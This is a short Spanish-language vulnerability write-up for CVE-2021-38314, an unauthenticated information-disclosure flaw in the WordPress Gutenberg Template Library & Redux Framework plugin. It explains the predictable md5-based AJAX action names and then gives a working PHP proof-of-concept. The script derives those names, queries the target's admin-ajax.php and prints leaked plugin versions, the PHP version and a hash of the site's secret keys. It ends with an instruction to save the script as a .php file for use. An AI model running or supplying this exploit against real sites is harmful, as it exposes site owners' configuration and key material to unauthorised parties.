
cve-2021-38314 - Divulgación de información sensible no autenticada
El plugin Gutenberg Template Library & Redux Framework <= 4.2.11 para WordPress registró varias acciones AJAX disponibles para usuarios no autenticados en la función includes en redux-core/class-redux-core.php que eran únicas para un sitio determinado, pero deterministas y predecibles, ya que se basaban en un hash md5 de la URL del sitio con un valor de sal conocido de '-redux' y un hash md5 del hash anterior con un valor de sal conocido de '-support'. Estas acciones AJAX podían utilizarse para recuperar una lista de plugins activos y sus versiones, la versión de PHP del sitio y un hash md5 sin sal del AUTH_KEY del sitio concatenado con el SECURE_AUTH_KEY [1][2]
<?php
$target = "https://target.com";
$key1 = md5("$target/-redux");
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
$key3 = md5($key2. '-support');
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");
Guardar como código fuente con extensión .php
